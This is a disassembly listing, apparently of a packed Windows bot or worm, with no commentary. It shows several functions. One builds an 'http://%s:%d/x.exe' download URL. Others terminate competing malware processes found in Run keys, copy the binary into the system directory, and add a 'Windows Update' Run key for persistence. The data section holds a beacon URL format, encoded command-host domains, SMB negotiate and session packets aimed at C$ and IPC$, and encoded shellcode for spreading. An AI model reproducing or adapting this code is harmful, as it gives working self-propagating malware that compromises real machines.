pop ebx
loc_30902661: ; CODE XREF: sub_309025A8+11�j
push 0
call dword_309010CC ; ExitThread
xor eax, eax
leave
retn 4
sub_309025A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090266F proc near ; CODE XREF: UPX0:3090273D�p
; UPX0:loc_309027A3�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_30901FB1
push eax
call dword_30901158 ; inet_ntoa
mov esi, dword_30901068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpy
push dword_30904FDC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_30901118 ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_309042F2
call esi ; lstrcpy
push offset byte_309042F0
call dword_30901084 ; lstrlen
mov byte_309042F0[eax], 0DFh
pop esi
leave
retn
sub_3090266F endp
; ---------------------------------------------------------------------------
loc_309026CB: ; DATA XREF: sub_3090235D+118�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_30904FE4, ebx
call sub_30901FF0
mov esi, dword_30901094
mov edi, 1388h
test eax, eax
jnz short loc_309026F9
loc_309026ED: ; CODE XREF: UPX0:309026F7�j
push edi
call esi ; Sleep
call sub_30901FF0
test eax, eax
jz short loc_309026ED
loc_309026F9: ; CODE XREF: UPX0:309026EB�j
lea eax, [esp+14h]
push ebx
push eax
call dword_3090112C ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_30904FE8, ebx
pop ebp
mov word_30904FEC, 96h
jz short loc_30902736
mov dword_30904FE8, 1
mov ebp, 15Eh
mov word_30904FEC, 14h
loc_30902736: ; CODE XREF: UPX0:3090271C�j
call sub_30901FB1
mov ebx, eax
call sub_3090266F
cmp ebx, 100007Fh
jz short loc_30902757
push ebx
push offset sub_309024BC
call sub_30901F0A
pop ecx
pop ecx
loc_30902757: ; CODE XREF: UPX0:30902748�j
mov dword ptr [esp+10h], 4
loc_3090275F: ; CODE XREF: UPX0:30902770�j
push ebx
push offset sub_30902520
call sub_30901F0A
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_3090275F
test ebp, ebp
jle short loc_30902787
loc_30902776: ; CODE XREF: UPX0:30902785�j
push 0
push offset sub_309025A8
call sub_30901F0A
pop ecx
dec ebp
pop ecx
jnz short loc_30902776
loc_30902787: ; CODE XREF: UPX0:30902774�j
; UPX0:30902793�j ...
call sub_30901FF0
test eax, eax
jz short loc_30902795
push edi
call esi ; Sleep
jmp short loc_30902787
; ---------------------------------------------------------------------------
loc_30902795: ; CODE XREF: UPX0:3090278E�j
; UPX0:309027A1�j
call sub_30901FF0
test eax, eax
jnz short loc_309027A3
push edi
call esi ; Sleep
jmp short loc_30902795
; ---------------------------------------------------------------------------
loc_309027A3: ; CODE XREF: UPX0:3090279C�j
call sub_3090266F
jmp short loc_30902787
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309027AA proc near ; CODE XREF: sub_30902943+8C�p
; sub_30902ABD+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3090100C ; RegOpenKeyExA
test eax, eax
jnz short loc_309027DD
push [ebp+arg_8]
push [ebp+arg_4]
call dword_30901010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_30901014 ; RegCloseKey
loc_309027DD: ; CODE XREF: sub_309027AA+1C�j
pop ebp
retn
sub_309027AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309027DF proc near ; CODE XREF: sub_3090216F+33�p
; sub_30902943+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3090100C ; RegOpenKeyExA
test eax, eax
jz short loc_3090280B
push 1
pop eax
jmp short loc_30902835
; ---------------------------------------------------------------------------
loc_3090280B: ; CODE XREF: sub_309027DF+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_30901008 ; RegQueryValueExA
test eax, eax
jz short loc_3090282A
push 2
pop esi
loc_3090282A: ; CODE XREF: sub_309027DF+46�j
push [ebp+arg_10]
call dword_30901014 ; RegCloseKey
mov eax, esi
loc_30902835: ; CODE XREF: sub_309027DF+2A�j
pop esi
leave
retn
sub_309027DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902838 proc near ; CODE XREF: sub_309029F1+96�p
; sub_30902ABD+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_30901000 ; RegCreateKeyExA
test eax, eax
jz short loc_30902861
push 1
pop eax
jmp short loc_30902888
; ---------------------------------------------------------------------------
loc_30902861: ; CODE XREF: sub_30902838+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_30901004 ; RegSetValueExA
test eax, eax
jz short loc_3090287D
push 2
pop esi
loc_3090287D: ; CODE XREF: sub_30902838+40�j
push [ebp+arg_4]
call dword_30901014 ; RegCloseKey
mov eax, esi
loc_30902888: ; CODE XREF: sub_30902838+27�j
pop esi
pop ebp
retn
sub_30902838 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090288B proc near ; CODE XREF: sub_30902943+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_30901084 ; lstrlen
mov esi, eax
dec esi
test esi, esi
jle loc_3090293F
loc_309028AB: ; CODE XREF: sub_3090288B+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_309028B4
dec esi
jns short loc_309028AB
loc_309028B4: ; CODE XREF: sub_3090288B+24�j
push 0
push 2
call sub_30902C8C ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_3090293F
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_30902C36 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_30902C86 ; Process32First
test eax, eax
jz short loc_3090293F
lea esi, [esi+ebx+1]
loc_309028FC: ; CODE XREF: sub_3090288B+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_30901100 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3090292C
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_309010AC ; OpenProcess
push 0
push eax
call dword_30901060 ; TerminateProcess
loc_3090292C: ; CODE XREF: sub_3090288B+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_30902C80 ; Process32Next
test eax, eax
jnz short loc_309028FC
loc_3090293F: ; CODE XREF: sub_3090288B+1A�j
; sub_3090288B+38�j ...
pop esi
pop ebx
leave
retn
sub_3090288B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902943 proc near ; CODE XREF: UPX0:30902326�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_309029AC: ; CODE XREF: sub_30902943+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_309027DF
add esp, 14h
test eax, eax
jnz short loc_309029E3
push ebx
push edi
push esi
call sub_309027AA
lea eax, [ebp+var_138]
push eax
call sub_3090288B
add esp, 10h
loc_309029E3: ; CODE XREF: sub_30902943+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_309029AC
pop edi
pop esi
pop ebx
leave
retn
sub_30902943 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309029F1 proc near ; CODE XREF: sub_30902ABD+D1�p
; sub_30902ABD+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_30902A06
push [ebp+arg_0]
call dword_309010E0 ; DeleteFileA
loc_30902A06: ; CODE XREF: sub_309029F1+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3090108C ; GetSystemDirectoryA
test eax, eax
jz locret_30902ABB
push esi
call dword_309010F8 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_30901F2B
mov esi, dword_30901088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_30904228
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push offset dword_30904230
push eax
call esi ; lstrcat
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_30901050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_30901084 ; lstrlen
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_30902838
add esp, 14h
push dword_30904FD4
call dword_3090107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_30901054 ; WinExec
push 1F4h
call dword_30901094 ; Sleep
push 0
call dword_309010D8 ; ExitProcess
pop esi
locret_30902ABB: ; CODE XREF: sub_309029F1+23�j
leave
retn
sub_309029F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902ABD proc near ; CODE XREF: UPX0:3090232B�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_30901048 ; GetModuleFileNameA
test eax, eax
jz loc_30902BF6
and dword_30904FF0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_309027DF
add esp, 14h
test eax, eax
jz short loc_30902B43
call dword_309010F8 ; rand
push 0Ah
mov ebx, offset aDuoelmgljwhgut ; "duoelmgljwhgutvml"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_30901F2B
pop ecx
pop ecx
push ebx
call dword_30901084 ; lstrlen
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_30902838
add esp, 14h
jmp short loc_30902B52
; ---------------------------------------------------------------------------
loc_30902B43: ; CODE XREF: sub_30902ABD+4D�j
lea eax, [ebp+var_20]
push eax
push offset aDuoelmgljwhgut ; "duoelmgljwhgutvml"
call dword_30901068 ; lstrcpy
loc_30902B52: ; CODE XREF: sub_30902ABD+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_309027DF
add esp, 14h
test eax, eax
jz short loc_30902B98
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_30902838
lea eax, [ebp+var_84]
push eax
push 0
call sub_309029F1
add esp, 1Ch
jmp short loc_30902BF6
; ---------------------------------------------------------------------------
loc_30902B98: ; CODE XREF: sub_30902ABD+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3090104C ; lstrcmpi
test eax, eax
jnz short loc_30902BE1
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_309027DF
add esp, 14h
test eax, eax
jnz short loc_30902BF6
push ebx
push edi
push esi
mov dword_30904FF0, 1
call sub_309027AA
add esp, 0Ch
jmp short loc_30902BF6
; ---------------------------------------------------------------------------
loc_30902BE1: ; CODE XREF: sub_30902ABD+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_309029F1
pop ecx
pop ecx
loc_30902BF6: ; CODE XREF: sub_30902ABD+1F�j
; sub_30902ABD+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_30902ABD endp
; =============== S U B R O U T I N E =======================================
sub_30902BFB proc near ; CODE XREF: sub_309011A0+CA�p
; sub_309015C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_30901044 ; VirtualAlloc
retn
sub_30902BFB endp
; =============== S U B R O U T I N E =======================================
sub_30902C0F proc near ; CODE XREF: sub_309011A0+10B�p
; sub_309015C7+BD�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_30901040 ; VirtualFree
retn
sub_30902C0F endp
; ---------------------------------------------------------------------------
align 10h
loc_30902C30: ; DATA XREF: sub_30901422+A�o
; sub_3090235D+A�o
jmp dword ptr loc_309010FC
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C36 proc near ; CODE XREF: sub_309017B9+128�p
; sub_309017B9+134�p ...
jmp dword_309010F4
sub_30902C36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C3C proc near ; CODE XREF: sub_309017B9+9C�p
; sub_309017B9+C5�p ...
jmp dword_309010F0
sub_30902C3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C42 proc near ; CODE XREF: sub_309017B9+93�p
; sub_309017B9+B2�p ...
jmp dword_309010EC
sub_30902C42 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_30902C50 proc near ; CODE XREF: sub_309017B9+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_30902C70
loc_30902C5C: ; CODE XREF: sub_30902C50+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_30902C5C
loc_30902C70: ; CODE XREF: sub_30902C50+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_30902C50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C80 proc near ; CODE XREF: sub_3090288B+AB�p
jmp dword_30901064
sub_30902C80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C86 proc near ; CODE XREF: sub_3090288B+64�p
jmp dword_3090105C
sub_30902C86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C8C proc near ; CODE XREF: sub_3090288B+2D�p
jmp dword_30901058
sub_30902C8C endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4DBh dup(0)
dword_30904000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_30901422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_309015C7+84�o
align 10h
byte_30904080 db 1 ; DATA XREF: sub_3090169C+5�r
off_30904081 dd offset dword_3090421C ; DATA XREF: sub_3090169C+D�r
db 1, 0Ch, 42h
db 90h
db 30h, 1, 0FCh
dd 1309041h, 309041ECh, 9041D800h, 41C80130h, 0B8013090h
dd 309041h, 309041ACh, 9041A001h, 41900130h, 80003090h
dd 1309041h, 30904174h, 90416801h, 415C0130h, 54013090h
dd 1309041h, 30904144h, 90413401h, 41200130h, 10013090h
dd 1309041h, 30904108h, 9040FC01h, 40F00130h, 3090h, 68746566h
dd 2E647261h, 7A6962h, 6B636168h, 2E737265h, 766Ch, 2E767663h
dd 7572h, 2E777777h, 6C646572h, 2E656E69h, 7572h, 69766F6Ch
dd 646F676Eh, 736F682Eh, 6B732E74h, 0
dd 656C6966h, 72616573h, 722E6863h, 75h, 646C6F67h, 61736E65h
dd 722E646Eh, 75h, 6B637566h, 75722Eh, 6F646170h, 2E696B6Eh
dd 67726Fh, 6A6F7274h, 722E6E61h, 75h, 63657361h, 2E616B68h
dd 7572h, 7473616Dh, 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 722E7A61h
dd 75h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dd 72617778h, 6A632E65h, 656E2E62h, 74h
dword_3090421C dd 617A616Dh, 616B6166h, 75722Eh ; DATA XREF: UPX0:off_30904081�o
dword_30904228 dd 6578652Eh, 0 ; DATA XREF: sub_309011A0+75�o
; sub_30902036+55�o ...
dword_30904230 dd 5Ch ; DATA XREF: sub_309011A0+49�o
; sub_309029F1+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_309011A0+13�o
align 4
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_30901316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_30901316+C�o
align 10h
aZer0 db 'zer0',0 ; DATA XREF: sub_30901422+34�o
align 4
aHttpS db 'http://%s',0 ; DATA XREF: sub_309015C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s?scn=%d?inf=%d?ver=14?cnt=%s',0
; DATA XREF: sub_309015C7+57�o
align 10h
byte_309042F0 db 0EBh ; DATA XREF: sub_309017B9+24E�o
; sub_309017B9+260�o ...
db 58h
word_309042F2 dw 7468h ; DATA XREF: sub_3090266F+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999ADh, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_309045B8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_309017B9+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_30904644 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_309046F0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_309047D0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_309017B9+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_30904834 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_309048A0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_30904944 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_309049C4 dd 401495h, 3, 40707Ch, 1, 0 ; DATA XREF: sub_309017B9+51C�o
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_30904A58 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_30904AC4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_30904B38 dd 0 ; DATA XREF: sub_309017B9+3A0�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_30904BF6 dd 1004600h ; DATA XREF: sub_309017B9+289�r
dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_30904C30 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_309017B9+41B�o
; sub_309017B9+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_30904CA8: ; DATA XREF: sub_309017B9+44A�o
jmp short loc_30904CB0
; ---------------------------------------------------------------------------
jmp short loc_30904CB2
; ---------------------------------------------------------------------------
align 10h
loc_30904CB0: ; CODE XREF: UPX0:loc_30904CA8�j
; DATA XREF: sub_309017B9+5C�o
pop esp
pop esp
loc_30904CB2: ; CODE XREF: UPX0:30904CAA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_30904CBC dd 1CEC8166h ; DATA XREF: sub_309017B9+D�r
dword_30904CC0 dd 0E4FF07h ; DATA XREF: sub_309017B9+1C�r
